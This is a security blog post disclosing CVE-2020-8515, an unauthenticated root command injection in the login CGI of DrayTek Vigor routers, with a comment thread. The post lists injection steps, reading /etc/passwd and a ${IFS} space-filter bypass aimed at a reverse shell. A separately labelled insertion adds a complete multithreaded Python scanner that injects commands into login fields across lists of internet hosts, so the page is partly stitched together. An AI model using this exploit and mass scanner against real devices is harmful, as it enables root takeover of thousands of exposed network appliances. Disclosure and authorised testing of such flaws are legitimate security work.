Sunday, January 26, 2020

[DrayTek] - Unauthenticated RCE in Draytek Vigor 2960, 3900 and 300B (CVE-2020-8515)

DrayTek is a Taiwanese manufacturer of firewalls, VPN appliances, routers, WLAN devices and similar network equipment. While investigating various network devices I came across a model named Vigor 2960 (not to be confused with the Cisco switch of a similar name). The DrayTek Vigor 2960 is a high-performance dual-WAN load-balancing router and VPN gateway.

When you log in through the web interface, the browser sends a POST request to mainfunction.cgi with several parameters.

Now, what happens if we append shell escape characters to each of those parameters? After a few tries it was possible to execute the pwd command: the injected metacharacters reach a shell, and the output of the command comes back in the response.

With command execution in hand I started thinking about how to escalate privileges, but there was a surprise. I expected the id command to answer "www-data" or something similar, yet it answered root. No escalation is needed: the CGI already runs as root.

Here are more examples of different commands being executed.
Oops! /etc/passwd ;)

Right now I'm working on the reverse shell, because the commands are parsed by mainfunction.cgi before they run. Getting a reverse shell from a command without spaces is a bit tricky: the sed-based parsing replaces every space with "+" (the form encoding of a space), so only space-free commands survive intact. The usual workaround for this kind of filter is to avoid literal spaces altogether, for example by using ${IFS} as the separator; whether that works here depends on how much of the value the CGI rewrites.

But I'm concerned about something more important than that. If you search right now for "Draytek" alone, you'll find 710,029 hosts.

If you search for the Vigor 2960 model alone, you get 15,429 hosts.

Are all of these hosts vulnerable? Let's find out.

After a few hours I had a Python script that checks whether each IP in a list is vulnerable to this RCE. I exported all the Vigor 2960 results, and a few hours later every host had been tested.


3,593 are vulnerable, and I'm 100% sure the real number is higher: any host that did not answer before the request timeout configured in the script was not counted, so the slow ones are missing from that figure.
And that's not all!
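The mass check described above, as an added example rather than the author's script: it takes the login form fields captured from the browser, appends a probe to each field with a handful of shell metacharacters, and classifies every host as vulnerable, not vulnerable, timed out, or errored, so that timeouts are counted next to the vulnerable hosts instead of silently lowering the count. The CGI path, the form field names, the metacharacter list and the use of `id` with `uid=0` as the hit marker are assumptions, not details given in the post; the canned transport exists so the logic can be exercised offline.

```python
"""Mass-check scaffold for the mainfunction.cgi command injection.

Added example, not the author's script. Assumptions (none stated on the
page): the CGI path, the login form fields passed in as `form`, the list of
shell metacharacters tried, and using `id` as the probe command.
"""
import socket
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from concurrent.futures import ThreadPoolExecutor

VULNERABLE, NOT_VULNERABLE, TIMEOUT, ERROR = "vulnerable", "not-vulnerable", "timeout", "error"

# Assumed path; take it from the login request captured in the browser.
CGI_PATH = "/cgi-bin/mainfunction.cgi"

# Separators tried in each field; which one breaks out of the shell string is device-specific.
ESCAPES = [";", "|", "'", '"', "`", "\n"]

# `id` contains no spaces, so it survives the space-to-"+" mangling the post mentions,
# and a hit is unambiguous: the CGI runs as root, so expect uid=0 in the reply.
PROBE = "id"
HIT = "uid=0"


def build_body(form, field, escape):
    """URL-encoded POST body with `escape + id + escape` appended to `field`."""
    mutated = dict(form)
    mutated[field] = f"{form[field]}{escape}{PROBE}{escape}"
    return urllib.parse.urlencode(mutated).encode()


def http_post(url, body, timeout):
    """Real transport: POST `body` to `url`, return the response text."""
    req = urllib.request.Request(url, data=body, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def make_canned_post(table):
    """Offline transport for dry runs: host -> reply text, "TIMEOUT" or "REFUSED" (constructed)."""
    def canned_post(url, body, timeout):
        host = urllib.parse.urlsplit(url).netloc
        reply = table.get(host, "REFUSED")
        if reply == "TIMEOUT":
            raise socket.timeout("canned timeout")
        if reply == "REFUSED":
            raise urllib.error.URLError("canned connection refused")
        # Only answer like a real device when the probe actually reached it.
        probe_seen = urllib.parse.quote_plus(";" + PROBE + ";").encode() in body
        return reply if probe_seen else "<html>login</html>"
    return canned_post


def check_host(host, form, timeout=5.0, post=http_post):
    """Classify one host. A timeout is reported as such, never as 'not vulnerable'."""
    url = f"http://{host}{CGI_PATH}"
    for field in form:
        for escape in ESCAPES:
            try:
                text = post(url, build_body(form, field, escape), timeout)
            except socket.timeout:
                return TIMEOUT
            except urllib.error.HTTPError as err:
                # A broken-out command may still push the CGI into a 5xx; inspect the body anyway.
                text = err.read().decode(errors="replace")
            except urllib.error.URLError as err:
                if isinstance(err.reason, socket.timeout):
                    return TIMEOUT
                return ERROR
            except OSError:
                return ERROR
            if HIT in text:
                return VULNERABLE
    return NOT_VULNERABLE


def scan(hosts, form, workers=32, timeout=5.0, post=http_post):
    """Check every host concurrently; returns {host: verdict}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        verdicts = list(pool.map(lambda h: check_host(h, form, timeout, post), hosts))
    return dict(zip(hosts, verdicts))


def summarize(results):
    """Count verdicts so the timeouts are reported beside the vulnerable count."""
    return Counter(results.values())


if __name__ == "__main__":
    # Constructed dry run; drop the `post=` argument to hit real devices you are authorised to test.
    demo = make_canned_post({"10.0.0.1": "uid=0(root) gid=0(root)", "10.0.0.2": "TIMEOUT"})
    result = scan(["10.0.0.1", "10.0.0.2", "10.0.0.3"], {"user": "admin", "pass": "x"}, post=demo)
    print(result, dict(summarize(result)))
```

Reporting timeouts as their own verdict is the point of the design: a list of 15,429 hosts scanned with a short timeout will always contain slow or rate-limited devices, and lumping them in with "not vulnerable" is exactly what makes the final count an underestimate.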

The same vulnerability works unchanged on the DrayTek Vigor 3900 and Vigor 300B as well.

Draytek Vigor 3900

Draytek 300B

Unlike the other two, the 300B is not a VPN device; it is a load balancer.

So far, which firmware versions have been confirmed vulnerable?

  • Vigor2960
    • 1.3.1_Beta
  • Vigor3900
    • 1.4.4_Beta
  • Vigor300B
    • 1.4.4_Beta
    • 1.3.3_Beta

CVE: CVE-2020-8515

By @mpx0



11 comments:

  1. Hi!
    Did you request CVE self or through DrayTek?

  2. Hello, can you send me the exploit script?

  3. What's the payload of the exploit? Can you send it to me at

  4. Can you add more explanation about this exploit, please?

  5. Hello, I am from the DrayTek company. Could you please provide the verification script for the vulnerability? Thank you very much.

  6. Do you have a script to run? I have lots of DrayTeks we manage and it would be great to run it against our IPs.

  7. I'm from FBI. Gimme the fucking script

  8. How can the script from this article be made available?

  9. Enjoyed reading the article above; it really explains everything in detail. The article is very interesting and effective. Thank you and good luck with the upcoming articles. Python Programming Training